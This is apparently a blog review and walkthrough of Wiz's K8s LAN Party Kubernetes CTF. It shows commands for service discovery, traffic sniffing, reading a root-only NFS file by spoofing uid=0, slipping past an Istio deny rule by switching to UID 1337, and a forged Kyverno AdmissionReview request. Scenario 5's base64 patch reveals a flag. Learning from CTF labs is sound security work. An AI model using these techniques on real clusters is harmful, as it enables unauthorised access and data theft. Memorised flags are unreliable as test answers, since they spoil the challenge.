Review of K8s LAN Party – a collection of tasks for searching for vulnerabilities in a Kubernetes cluster directly in the browser

I continue to test tools that help me learn how to secure Kubernetes clusters. This time let's take a look at the product from the developers from the company Wiz ResearchKubernetes LAN Party, a challenge to complete CTF scenarios. The release of the tool was timed to coincide with the KubeCon EMEA 2024 conference held in March this year.

In the article I will tell you why this tool is needed, and also go through all the scenarios that K8s LAN Party offers, and write my opinion about how cool this tool is and who will benefit from it.

Not long ago I did review Simulator – a platform for training Kubernetes security engineers using CTF scenarios.

What is K8s LAN Party and why is it needed?

K8s LAN Party is a set of five CTF scenarios in which the user needs to find vulnerabilities in a Kubernetes cluster. Each scenario focuses on a Kubernetes networking problem that Wiz Research engineers encountered in real-life practice. The tool will help participants deepen their knowledge of Kubernetes cluster security: they will have the opportunity to step into the shoes of attackers and study configuration errors, which will be useful in their work.

In K8s LAN Party the cluster is already deployed. The player only needs to execute commands in the terminal directly in the browser. And if the user registers, his result will be reflected in the general leaderboard and after completing the challenge he will receive a certificate of participation.

In K8s LAN Party the following rules for completing tasks:

  • You can run the scripts in any order.

  • The maximum score for completing the task is 10 points. But you can still use two tips. For their use, points will be deducted from the final result,

  • The flags that need to be found in each scenario have the format wiz_k8s_lan_party{*}. It must be specified in the input field on the task page:

After selecting a task, a terminal appears in which you will need to execute the commands:

Let's look at each scenario: let's go in order and start with Recon.

Scenario #1: Recon

In this scenario, we are in a compromised Kubernetes environment where we must find hidden internal services. To perform the task we have a utility dnscan.

First, find out what subnet we are on:

player@wiz-k8s-lan-party:~$ printenv 
HISTSIZE=2048
PWD=/home/player
HOME=/home/player
KUBERNETES_PORT_443_TCP=tcp://10.100.0.1:443
KUBERNETES_PORT_443_TCP_PROTO=tcp
KUBERNETES_PORT_443_TCP_ADDR=10.100.0.1
...

Our pod's IP address is 10.100.0.1. Let's scan the subnet 10.100.0.0/16:

player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.0/16
34997 / 65536 [--------------------------------------------------------------------->____________________________________________________________] 53.40% 982 p/s10.100.136.254 getflag-service.k8s-lan-party.svc.cluster.local.
65430 / 65536 [--------------------------------------------------------------------------------------------------------------------------------->] 99.84% 982 p/s10.100.136.254 -> getflag-service.k8s-lan-party.svc.cluster.local.
65536 / 65536 [---------------------------------------------------------------------------------------------------------------------------------] 100.00% 985 p/s

The utility found the service getflag-service. Let's run a query on it:

player@wiz-k8s-lan-party:~$ curl 
getflag-service.k8s-lan-party.svc.cluster.local
wiz_k8s_lan_party{<flag>}

We found the flag. We indicate it in the input field on the task page and get success:

Scenario #2: Finding neighbors

The authors write that there is a sidecar container lurking in our environment, which may be transmitting some sensitive data. Let's use the utility again dnscanmaybe she will find some additional services:

player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.0/16
43867 / 65536 [--------------------------------------------------------------------------------------->__________________________________________] 66.94% 984 p/s10.100.171.123 reporting-service.k8s-lan-party.svc.cluster.local.
65330 / 65536 [--------------------------------------------------------------------------------------------------------------------------------->] 99.69% 984 p/s10.100.171.123 -> reporting-service.k8s-lan-party.svc.cluster.local.
65528 / 65536 [--------------------------------------------------------------------------------------------------------------------------------->] 99.99% 984 p/splayer@wiz-k8s-lan-party:~$ curl reporting-service.k8s-lan-party.svc.cluster.local
player@wiz-k8s-lan-party:~$ 

This time curl He didn’t give us anything to the service. Let's listen to all the traffic that goes inside the pod and write it to a dump file:

player@wiz-k8s-lan-party:~$ tcpdump -s 0 -n -w dump.pcap
tcpdump: listening on ns-c75457, link-type EN10MB (Ethernet), snapshot length 262144 bytes
^C28 packets captured
28 packets received by filter
0 packets dropped by kernel

Now let's look for something interesting in the dump. We know that the flag we are looking for should be called wiz_k8s_lan_party:

player@wiz-k8s-lan-party:~$ tcpdump -r dump.pcap -A | grep wiz_k8s_lan_party
reading from file dump.pcap, link-type EN10MB (Ethernet), snapshot length 262144
wiz_k8s_lan_party{<flag>}
wiz_k8s_lan_party{<flag>}

Another flag has been found. Don’t forget to copy it to complete the task and paste it into the input field on the task page.

Scenario #3: Data leakage

This scenario uses a storage system where access control is network-based. Apparently, an NFS share is mounted to the hearth. Let's check this:

player@wiz-k8s-lan-party:~$ df -h
Filesystem                                          Size  Used Avail Use% Mounted on
overlay                                             300G   24G  277G   8% /
fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com:/  8.0E     0  8.0E   0% /efs
tmpfs                                                60G   12K   60G   1% /var/run/secrets/kubernetes.io/serviceaccount
tmpfs                                                64M     0   64M   0% /dev/null

Indeed, to the section /efs mounted NFS share. What's in this directory? Let's see:

player@wiz-k8s-lan-party:~$ ls -lah /efs
total 8.0K
drwxr-xr-x 2 root   root   6.0K Mar 11 11:43 .
drwxr-xr-x 1 player player   51 Mar 25 08:27 ..
---------- 1 daemon daemon   73 Mar 11 13:52 flag.txt
player@wiz-k8s-lan-party:~$ cat /efs/flag.txt 
cat: /efs/flag.txt: Permission denied

The flag we need is here, but we do not have enough rights to view it. Let's use the utility nfs-cat to view the contents of the file: do not forget to specify the NFS version, UID and GID:

player@wiz-k8s-lan-party:~$ nfs-cat "nfs://fs-0779524599b7d5e7e.efs.us-west-1.amazonaws.com//flag.txt?version=4&uid=0&gid=0"
wiz_k8s_lan_party{<flag>}

Another flag found. Go ahead.

Scenario #4: Bypassing Boundaries

The task description says that in this environment it is used service meshand also the limiting rule is applied Istio:

apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: istio-get-flag
  namespace: k8s-lan-party
spec:
  action: DENY
  selector:
    matchLabels:
      app: "{flag-pod-name}"
  rules:
  - from:
    - source:
        namespaces: ["k8s-lan-party"]
    to:
    - operation:
        methods: ["POST", "GET"]

Let's use the utility dnscan to search for services in a given environment:

root@wiz-k8s-lan-party:~# dnscan -subnet 10.100.0.0/16
57388 / 65536 [----------------------------------------------------------------------------------------------------------------->________________] 87.57% 988 p/s10.100.224.159 istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
65491 / 65536 [--------------------------------------------------------------------------------------------------------------------------------->] 99.93% 988 p/s10.100.224.159 -> istio-protected-pod-service.k8s-lan-party.svc.cluster.local.
root@wiz-k8s-lan-party:~# curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local
RBAC: access denied

Service found istio-protected-pod-servicehowever, attempting to query it is prohibited by Istio policy.

Here you can remember one interesting vulnerability Istio, which our colleagues from Luntry wrote about. Thanks to this vulnerability, an attacker who gets inside a pod running Istio sidecar can only set the UID or GID to 1337. This will help bypass Istio traffic filtering. Let's try to do this:

root@wiz-k8s-lan-party:~# su istio
$ curl istio-protected-pod-service.k8s-lan-party.svc.cluster.local
wiz_k8s_lan_party{<flag>}

The last flag remains.

Scenario #5: Lateral movement

The environment for this scenario uses a Kyverno admission controller. We are given a kyverno policy that adds a FLAG variable to the created pods in the namespace sensitive-ns:

apiVersion: kyverno.io/v1
kind: Policy
metadata:
  name: apply-flag-to-env
  namespace: sensitive-ns
spec:
  rules:
    - name: inject-env-vars
      match:
        resources:
          kinds:
            - Pod
      mutate:
        patchStrategicMerge:
          spec:
            containers:
              - name: "*"
                env:
                  - name: FLAG
                    value: "{flag}"

Let's try to create some kind of pod. Let's describe the standard manifest for the nginx pod and apply it in the namespace sensitive-ns:

apiVersion: v1
kind: Pod
metadata:
  name: pod
  namespace: sensitive-ns
spec:
  containers:
  - name: nginx
    image: nginx:latest
    ports:
    - containerPort: 80

Unfortunately, we don't have permission to create pods in this namespace:

player@wiz-k8s-lan-party:~$ kubectl apply -f pod.yaml 
2024/03/31 18:27:19 Starlark failed to allocate 4GB address space: cannot allocate memory. Integer performance may suffer.
Error from server (Forbidden): error when retrieving current configuration of:
Resource: "/v1, Resource=pods", GroupVersionKind: "/v1, Kind=Pod"
Name: "pod", Namespace: "sensitive-ns"
from server for: "pod.yaml": pods "pod" is forbidden: User "system:serviceaccount:k8s-lan-party:default" cannot get resource "pods" in API group "" in the namespace "sensitive-ns"

Looks like it's time to take advantage of the tips. This is an English-language project, so for the article we translated them into Russian:

Hint #1

Need help writing AdmissionReview requests? Take advantage https://github.com/anderseknert/kube-review

Hint #2

This exercise has three components: hostname kyverno (can be found using dnscan), the corresponding HTTP path (can be viewed in the Kyverno source code) and the AdmissionReview request.

It turns out we need to find available services kyverno. Let's scan the pod network using the utility dnscan:

player@wiz-k8s-lan-party:~$ dnscan -subnet 10.100.0.0/16
10.100.86.210 -> kyverno-cleanup-controller.kyverno.svc.cluster.local.
10.100.126.98 -> kyverno-svc-metrics.kyverno.svc.cluster.local.
10.100.158.213 -> kyverno-reports-controller-metrics.kyverno.svc.cluster.local.
10.100.171.174 -> kyverno-background-controller-metrics.kyverno.svc.cluster.local.
10.100.217.223 -> kyverno-cleanup-controller-metrics.kyverno.svc.cluster.local.
10.100.232.19 -> kyverno-svc.kyverno.svc.cluster.local.

We need to send a request to the service kyverno-svc.kyverno.svc.cluster.localwhich will create a pod and modify it by adding a variable according to the policy apply-flag-to-env. To do this, you need to create an AdmissionReview request for endpoint /mutate which will call mutating webhook.

We create a config for AdmissionReview in accordance with documentation or we can use the tool kube-review. We indicate the required fields, as well as the main thing for us in this task – the FLAG variable, which we will see after applying the request:

{
    "apiVersion": "admission.k8s.io/v1",
    "kind": "AdmissionReview",
    "request": {
      "kind": {
        "group": "",
        "version": "v1",
        "kind": "Pod"
      },
      "resource": {
        "group": "",
        "version": "v1",
        "resource": "pods"
      },
      "requestKind": {
        "group": "",
        "version": "v1",
        "kind": "Pod"
      },
      "requestResource": {
        "group": "",
        "version": "v1",
        "resource": "pods"
      },
      "namespace": "sensitive-ns",
      "operation": "CREATE",
      "object": {
        "apiVersion": "v1",
        "kind": "Pod",
        "metadata": {
          "name": "pod",
          "namespace": "sensitive-ns"
        },
        "spec": {
          "containers": [
            {
              "name": "nginx",
              "image": "nginx:latest",
              "env": [
                {
                  "name": "FLAG",
                  "value": "{flag}"
                }
              ]
            }
          ]
        }
      }
    }
  }

Let's make a call to service kyverno:

player@wiz-k8s-lan-party:~$ curl -k -X POST https://kyverno-svc.kyverno.svc.cluster.local/mutate -H "Content-Type: application/json" --data '<json>'

As a result we got responsewhere the information we are interested in is contained in Base64 encoded format:

"response": {
    "uid": "",
    "allowed": true,
    "patch": "W3sib3AiOiJyZXBsYWNlIiwicGF0aCI6Ii9zcGVjL2NvbnRhaW5lcnMvMC9lbnYvMC92YWx1ZSIsInZhbHVlIjoid2l6X2s4c19sYW5fcGFydHl7eW91LWFyZS1rOHMtbmV0LW1hc3Rlci13aXRoLWdyZWF0LXBvd2VyLXRvLW11dGF0ZS15b3VyLXdheS10by12aWN0b3J5fSJ9LCB7InBhdGgiOiIvbWV0YWRhdGEvYW5ub3RhdGlvbnMiLCJvcCI6ImFkZCIsInZhbHVlIjp7InBvbGljaWVzLmt5dmVybm8uaW8vbGFzdC1hcHBsaWVkLXBhdGNoZXMiOiJpbmplY3QtZW52LXZhcnMuYXBwbHktZmxhZy10by1lbnYua3l2ZXJuby5pbzogcmVwbGFjZWQgL3NwZWMvY29udGFpbmVycy8wL2Vudi8wL3ZhbHVlXG4ifX1d",
    "patchType": "JSONPatch"
  }

This line also contains our flag. We paste it into the input field and complete our script.

The service congratulates us on passing, and now we can receive a certificate:

Results

Compared to the Simulator we reviewed earlier, K8s LAN Party is simpler in functionality, as it is just a challenge with a limited set of tasks. Minor difficulties may arise only in scenario No. 5. At the same time, the tasks presented were quite interesting.

First of all, I recommend taking the K8s LAN Party to novice engineers who are interested in the security of Kubernetes clusters. But higher-level specialists will also be interested in working with the vulnerabilities presented in the scenarios.

PS

Read also in our blog:

Similar Posts

Leave a Reply

Your email address will not be published. Required fields are marked *